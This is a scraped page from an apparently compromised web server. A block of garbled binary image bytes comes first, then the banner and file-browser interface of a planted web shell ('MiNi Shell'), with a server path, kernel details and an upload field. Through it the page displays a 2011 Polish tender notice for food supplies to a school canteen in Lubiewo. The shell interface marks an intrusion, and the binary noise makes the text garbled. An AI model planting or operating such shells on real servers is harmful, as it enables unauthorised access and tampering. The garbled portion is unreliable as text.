JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111220/338099-N-2011.html

<p class="kh_header"><b>Lubiewo: Dostawa artykułów spożywczych do stołówki Zespołu Szkół w Lubiewie, ul. Wojska Polskiego 16</b><br>
<b>Numer ogłoszenia: 338099 - 2011; data zamieszczenia: 20.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół w Lubiewie , ul. Wojska Polskiego 16, 89-526 Lubiewo, woj. kujawsko-pomorskie, tel. 52 33 493 77, faks 52 33 493 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubiewo.bip.net.pl, www.zslubiewo.las.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zespół szkół - jednostka organizacyjna gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do stołówki Zespołu Szkół w Lubiewie, ul. Wojska Polskiego 16.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Dostawa artykułów spożywczych do stołówki Zespołu Szkół w Lubiewie, ul. Wojska Polskiego 16, szczegółowo wg załącznika nr 1 do niniejszej specyfikacji, tj. formularza ofertowego, w którym określono: nazwy towarów, jednostki miary, szczegółowy opis towaru oraz prognozowane zapotrzebowanie ilościowe w okresie realizacji zamówienia. Dostarczane artykuły muszą być oznakowane zgodnie z obowiązującym prawem sanitarnym, każde opakowanie musi zawierać co najmniej następujące dane: - nazwę produktu i rodzaj, - wykaz składników, - termin przydatności do spożycia, - masę netto, warunki przechowywania, - nazwę i adres producenta. Oferowane artykuły spożywcze muszą być wysokiej jakości pod względem właściwości organoleptycznych (wygląd, smak, zapach) jak i odżywczych oraz posiadać maksymalny okres przydatności do spożycia przewidziany dla danego artykułu spożywczego, licząc od daty dostawy. Dostawa artykułów spożywczych nastąpi po uprzednim złożeniu zamówienia przez osobę wyznaczoną przez Zamawiającego, dostawa towaru odbywać się będzie w godzinach od 7.30 - 10.00, w niżej wymienionych terminach: - dowóz produktów mięsnych - poniedziałki i środy; - dowóz pieczywa, świeżych wyrobów piekarskich i ciastkarskich - codziennie; - dowóz pozostałych artykułów spożywczych - wtorki i czwartki. Zamawiający zastrzega sobie możliwość zmiany w zapotrzebowaniu ilościowym artykułów spożywczych, z przyczyn obiektywnych, np. zakwestionowane zostaną przez służby sanitarne pomieszczenia przeznaczone do przygotowywania, wydawania i spożywania posiłków, nastąpi zmniejszenie ilości dożywianych dzieci do okolo 20% planowanej ilości oraz zmiana ilości dni dożywiania. Zamawiający w tej sytuacji nie ponosi prawnej ani materialnej odpowiedzialności za niewykonanie całości przedmiotu zamówienia, a Wykonawcy nie przysługuje roszczenie odszkodowawcze z tytułu nie zrealizowania pełnego zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-1, 15.50.00.00-3, 15.40.00.00-2, 15.60.00.00-4, 15.20.00.00-0, 03.14.00.00-4, 15.90.00.00-7, 15.81.00.00-9, 15.13.00.00-8, 15.33.11.70-9, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnianie tego warunku wymagane jest przedłożenie: 1. Oświadczenia Wykonawcy ubiegającego się o udzielenie zamówienia publicznego w trybie art. 22 ust. 1 ustawy (na druku stanowiącym Załącznik Nr 2 do specyfikacji istotnych warunków zamówienia); 2. Koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności w zakresie objętym niniejszym zamówieniem publicznym.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie tego warunku wymagane jest przedłożenie: 1. Oświadczenia Wykonawcy ubiegającego się o udzielenie zamówienia publicznego w trybie art. 22 ust. 1 ustawy (na druku stanowiącym Załącznik Nr 2 do specyfikacji istotnych warunków zamówienia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie tego warunku wymagane jest przedłożenie: 1. Oświadczenia Wykonawcy ubiegającego się o udzielenie zamówienia publicznego w trybie art. 22 ust. 1 ustawy (na druku stanowiącym Załącznik Nr 2 do specyfikacji istotnych warunków zamówienia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie tego warunku wymagane jest przedłożenie: 1. Oświadczenia Wykonawcy ubiegającego się o udzielenie zamówienia publicznego w trybie art. 22 ust. 1 ustawy (na druku stanowiącym Załącznik Nr 2 do specyfikacji istotnych warunków zamówienia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie tego warunku wymagane jest przedłożenie: 1. Oświadczenia Wykonawcy ubiegającego się o udzielenie zamówienia publicznego w trybie art. 22 ust. 1 ustawy (na druku stanowiącym Załącznik Nr 2 do specyfikacji istotnych warunków zamówienia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty - Załącznik nr 1 do SIWZ, 2) W przypadku, gdy Wykonawcę reprezentuje petnomocnik, do oferty musi być załączone petnomocnictwo podpisane przez osoby uprawnione do reprezentacji Wykonawcy, 3) Informacja na temat zamiaru powierzenia podwykonawcom części zamowienia - Załącznik
nr 5 do SIWZ, pisemne zobowiązanie tych podmiotow składa Wykonawca, ktoremu zostanie powierzone do realizacji dany przedmiot zamowienia, przy podpisaniu umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy.
Na wyżej wymienione zmiany Zamawiający może wyrazić zgodę, jeśli dotyczą zmiany urzędowej stawki podatku VAT - na dostawy objęte umową dopuszcza się zmianę ceny za realizację przedmiotu zamówienia według zasady, że do wartości netto przedmiotu zamówienia doliczona zostanie nowa wartość podatku VAT. Zakwestionowane zostaną przez służby sanitarne pomieszczenia przeznaczone do przygotowywania, wydawania i spożywania posiłków. Nastąpi zmiejszenie ilości dożywianych dzieci do 20% planowanej ilości oraz zmiana ilości dni dożywiania. Zamawiający w tej sytuacji nie ponosi prawnej ani materialnej odpowiedzialności za niewykonanie całości przedmiotu zamówienia, a Wykonawcy nie przysługuje roszczenie odszkodowawcze z tytułu nie zrealizowania pełnego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubiewo.bip.net.pl, www.lubiewo.las.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego: Zespół Szkół w Lubiewie, ul. Wojska Polskiego 16, 89-526 Lubiewo, pokój nr 11 (sekretariat), w godzinach 8:00 - 14:00 lub na wniosek zostanie przesłana..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 09:00, miejsce: Zespół Szkół w Lubiewie, ul. Wojska Polskiego 16, 89-526 Lubiewo, pokój nr 11 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WARZYWA, OWOCE I PODOBNE PRODUKTY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> banany - 320 kg, buraki świeże - 140 kg, cebula - 50 kg, chrzan tarty słoiki 150 g - 40, cytryny 5 kg, czosnek kostka paczka 35 g - 15 szt., fasola drobna	paczka 400 g -	100, fasola Jaś lub równoważna paczka 400 g - 110, groch łuskany, połówki paczki 400 g - 120, groszek konserwowy	puszka	400 g - 80, gruszki - 150 kg, jabłka, słodkie Lobo - 700 kg, kalafior sztuka - 60, kapusta świeża	główka - 130, kapusta kiszona - 140 kg, kapusta pekińska główka - 60, kiwi op. 12 szt. w op. - 136, kompot ananasowy puszki 330 g - 80, kompot wiśniowy (wiśnia drążona) słoik ? l - 160, kompot agrestowy słoik 0,9 l - 9, kompot brzoskwiniowy puszka 450 g - 80, kompot z czarnej porzeczki słoik 0,9 l - 100, kompot śliwkowy renklodowy słoik 0,9 l - 96, kompot czereśniowy słoik 0,9 l - 96, ketchup Włocławek pikantny lub równoważny słoik 200 g - 120, ketchup Włocławek pikantny lub równoważny słoik 900 g - 40, koncentrat pomidorowy pikantny 30 % lub równoważny słoik 200 g - 60, koncentrat pomidorowy pikantny 30 % lub równoważny słoik 990 g - 65, koper świeży pęczek - 130, kukurydza konserwowa puszka 360 g - 70, liść laurowy op. 20 g - 8, majeranek paczka 30 g - 130, marchew świeża - 40 kg, mandarynki - 270 kg, ogórek świeży - 60 kg, ogórki kiszone - 54 kg, ogórki konserwowe	słoik 0,9 l - 210, papryka konserwowa słoiki 0,75 l - 12, papryka żółta, czerwona, zielona-świeża - 40 kg, papryka mielona (ostra, słodka) paczki 20 g - 24, pieczarki - 150 kg, pieprz czarny mielony op. 20 g - 130, pietruszka natka pęczek - 500, pietruszka korzeń - 80 kg, pomarańcze - 100 kg, pomidory - 10 kg, por szt. - 15, powidła słoik 400 g - 12, rodzynki	paczki 100 g - 24, seler konserwowy słoik	385 g - 70, seler korzeń - 10 kg, surówka (sałatka obiadowa) słoik 0,9 l - 90, szczypior 	pęczek - 20, śliwki suszone paczki 100 g - 20, ziele angielskie op. 20 g - 8, ziemniaki - 3500 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PRODUKTY MLECZARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> deser z koroną sztuki 175 g - 800, jogurt owocowy z kawałkami owoców JOGOBELLA lub równoważny sztuki 150 g - 2000, jogurt owocowy GRATKA sztuki 145 g - 1000, mleko 3,2% 1 l - 210, ser salami Chojnicki lub równoważny kg - 17, ser półtłusty Chojnicki lub równoważny kostki 251 g - 120, ser typu FETA kostki 270 g - 60, śmietana spray sztuki 250 g - 45, śmietana słodka 12% sztuki 200 g - 15, śmietana zakwaszona 12% sztuki 200 g - 430, śmietana zakwaszona 12% sztuki 400 g - 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> OLEJ I TŁUSZCZE ZWIERZĘCE LUB ROŚLINNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna Kasia lub równoważna	kostki 250 g - 220, masło mix z margaryną	kostki 200 g - 60, olej Kujawski lub równoważny sztuki 1 l - 30, Rama Combi Profi sztuki 3,75 l - 12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PRODUKTY PRZEMIAŁU ZIARNA, SKROBI I PRODUKTÓW SKROBIOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> mąka Wrocławska lub równoważne - 80 kg, kasza jęczmienna kg 500 g - 8, ryż sypki - 70 kg, makaron LUBELLA świderki, kolanka, nitki lub równoważny p - 350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PRODUKTY ZWIERZĘCE I PODOBNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jajka sztuki - 550.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> NAPOJE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napój owocowy szt. 200 ml - 1000, napój herbaciany, granulowany Ekoland lub równoważny p. 300 g - 270, syrop ŁOWICZ lub równoważny butelka 0,335 l - 250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PIECZYWO, ŚWIEŻE WYROBY PIEKARSKIE I CIASTKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bułka wyborowa szt. 0,05 kg - 13450, chleb zwykły szt. 0,5 kg - 130, chleb graham szt. 0,6 kg - 80, drożdżówka szt. 0,10 kg - 1200, pączki szt. - 600, rogale szt. 0,075 kg - 3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PRODUKTY MIĘSNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek wędzony - 25 kg, filet z kurczaka - 600 kg, farsz mielone - 250 kg, karkówka bk - 250 kg, kiełbasa żurkowa - 200 kg, kiełbasa Podwawelska lub równoważna kg 0,20 kg - 120 kg, biała parzona kg 0,10 kg - 40 kg, mielonka blok kg 2,20 kg - 40 kg, paluszki -  serdelki - 50 kg, parówka cienka wyborowa - 60 kg, schab bk - 240 kg, smalec - 15 kg, udziec z kurczaka kg 0,20 kg - 350 kg, golonka - 40 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WARZYWA MROŻONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> fasola szparagowa p. 0,45 kg - 140, frytki p. 2,5 kg - 20, marchew mrożona p. 0,45 kg - 120, włoszczyzna mrożona p. 0,45 kg - 650, pierogi z serem, truskawkami p. 2,5 kg - 60, mieszanka warzywna p. 0,45 kg - 140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> RYBY PRZETWORZONE I KONSERWOWANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filety z dorsza (do smażenia) - 45 kg, filety z morszczuka (do smażenia) - 45 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bułka tarta op. 500 g - 45, budyń op. 30 g - 420, cukier - 130 kg, cukier waniliowy op. 16 g - 100, curry op.	20 g - 8, cynamon op. 20 g - 10, czekolada mleczna szt. 100 g - 400, galaretka op. 100 g - 700, herbatniki PETTI BEURE p. 100 g - 800, kisiel op. 30 g - 650, kwasek cytrynowy op. 20 g - 100, musztarda stołowa słoiki 150 g - 6, majonez Pomorski lub równoważny słoiki 0,75 l - 9, ocet 10% butelka 0,5 l - 9, paluszki solone p. 60 g - 80 g - 800, panier do mięs p. 200 g - 150, przyprawa w płynie a la maggi butelki 210 g - 10, przyprawa warzywna Vegeta (czerwona) lub równoważna op. 75 g - 510, sos sałatkowy sypki op. 0,2 g - 160, sos (przyprawa) do potraw chińskich Knorr lub równoważna op. 36 g - 250, sól jodowana - 130 kg, wafelki w czekoladzie ciemnej bez dodatków Grześki lub równoważne szt. 39 g - 600, żurek op. - 60, żurek naturalny - zakwas szt.	0,47 l - 20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com